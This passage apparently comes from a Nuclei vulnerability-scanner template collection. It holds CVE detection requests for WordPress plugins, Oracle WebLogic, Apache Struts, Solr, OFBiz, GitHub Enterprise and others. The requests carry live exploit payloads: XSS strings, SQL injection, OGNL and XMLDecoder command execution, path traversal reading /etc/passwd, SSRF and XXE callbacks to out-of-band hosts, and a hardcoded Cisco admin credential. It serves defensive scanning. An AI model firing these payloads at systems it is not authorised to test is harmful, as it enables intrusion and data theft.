{{csrf}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["</textarea><script>alert(document.domain)</script>"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"header","name":"csrf","group":2,"regex":["ccsrftoken_([0-9_a-z]+)=\"([A-Z0-9]+)\";"],"internal":true}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-18502","info":{"name":"Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Subscriber by\")"],"condition":"and"}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-18562","info":{"name":"Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Error Log Viewer by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18492","info":{"name":"Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form to DB by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18496","info":{"name":"Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Htaccess by\")"],"condition":"and"}]}]},{"id":"CVE-2017-5871","info":{"name":"Odoo <= 8.0-20160726 & 9.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/session/logout?redirect=https://oast.me","{{BaseURL}}/web/session/logout?redirect=https%3a%2f%2foast.me%2f","{{BaseURL}}/web/dbredirect?redirect=https%3a%2f%2foast.me%2f"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18487","info":{"name":"AdPush < 1.44 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google AdSense\")"],"condition":"and"}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0200","info":{"name":"Github Enterprise Authenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v3/user/orgs"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"extractors":[{"type":"json","part":"body","name":"org_name","internal":true,"json":[".[].login"]}]},{"method":"GET","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"matchers-condition":"and","matchers":[{"type":"word","words":["\"role\": \"admin\""],"part":"body"}]},{"method":"POST","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"],"headers":{"Content-Type":"application/json","Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"body":"{\n  \"name\": \"{{randstr}}\"\n}\n","matchers":[{"type":"status","status":[201]}]},{"method":"GET","cookie-reuse":true,"path":["{{BaseURL}}/login"],"extractors":[{"type":"regex","part":"body","internal":true,"group":1,"regex":["name=\"authenticity_token\" value=\"(.*?)\""],"name":"csrf_token"}]},{"method":"POST","path":["{{BaseURL}}/session"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&\n","matchers":[{"type":"status","status":[302]},{"type":"word","words":["_gh_render"],"part":"header"}]},{"method":"GET","path":["{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"],"extractors":[{"type":"regex","group":1,"name":"ghe_secret","internal":true,"regex":["&quot;ENTERPRISE_SESSION_SECRET&quot;=&gt;&quot;([^\"]+?)&quot;"],"part":"body"}],"matchers":[{"type":"word","words":["ENTERPRISE_SESSION_SECRET"],"part":"body"}]},{"method":"GET","path":["{{BaseURL}}/"],"headers":{"Cookie":"_gh_render={{final_payoad}}"},"matchers-condition":"and","matchers":[{"type":"status","status":[500]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-0881","info":{"name":"Combo Blocks < 2.2.76 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["User Profile Builder"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free","{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{\"html\"","\"<div class=","\"pagination\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21893","info":{"name":"Ivanti SAML - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"raw":["POST /dana-ws/saml20.ws HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\t<soap:Body>\t\t<ds:Signature\t\txmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\t\t\t<ds:SignedInfo>\t\t\t\t<ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/>\t\t\t\t<ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/>\t\t\t</ds:SignedInfo>\t\t\t<ds:SignatureValue>qwerty</ds:SignatureValue>\t\t\t<ds:KeyInfo xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.w3.org/2000/09/xmldsig\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\t\t\t\t<ds:RetrievalMethod URI=\"http://{{interactsh-url}}\"/>\t\t\t\t<ds:X509Data/>\t\t\t</ds:KeyInfo>\t\t\t<ds:Object></ds:Object>\t\t</ds:Signature>\t</soap:Body></soap:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-38856","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/main/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-20439","info":{"name":"Hardcoded Admin Credentials For Cisco Smart Licensing Utility API","severity":"critical"},"requests":[{"raw":["GET /cslu/v1/scheduler/jobs HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y3NsdS13aW5kb3dzLWNsaWVudDpMaWJyYXJ5NEMkTFU=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"job_name\":","\"current_status\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6781","info":{"name":"Calibre <= 7.14.0 Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/export HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\"extra_file\", {{book_ids}}, \"../../../../../etc/passwd\", \"\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"content_type","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\"result\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27292","info":{"name":"Docassemble - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/interview?i=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[501]}]}]},{"id":"CVE-2024-22927","info":{"name":"eyoucms v.1.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=\"num\" value=\"1\"><ScRiPt >alert(document.domain)</ScRiPt>","id=\"eytime\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-35627","info":{"name":"TileServer API - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/v3/?key=%27-alert(document.domain)-%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["TileServer","'-alert(document.domain)-'"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5975","info":{"name":"CZ Loan Management <= 1.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"CZ Loan Management\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cz_plugin_for_user_get_percentage&selectedperiod=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-23163","info":{"name":"GestSup - Account Takeover","severity":"critical"},"requests":[{"raw":["POST /ajax/ticket_user_db.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: xmlhttprequest\nContent-Type: application/x-www-form-urlencoded\n\nmodifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success","firstname\":\"{{firstname}}\",\"lastname\":\"{{lastname}}"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}],"extractors":[{"type":"dsl","dsl":["\"Firstname: \"+ firstname","\"Lastname: \"+ lastname"]}]}]},{"id":"CVE-2024-1021","info":{"name":"Rebuild <= 3.5.5 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<h1> Interactsh Server </h1>\")","!contains(body_1, \"<h1> Interactsh Server </h1>\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1210","info":{"name":"LearnDash LMS < 4.10.2 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ldlms/v1/sfwd-quiz"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"quiz_materials\":","quizzes"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-9234","info":{"name":"GutenKit <= 2.1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/gutenkit-blocks-addon\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nplugin=http://{{interactsh-url}}/{{filename}}.zip\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Failed to unzip 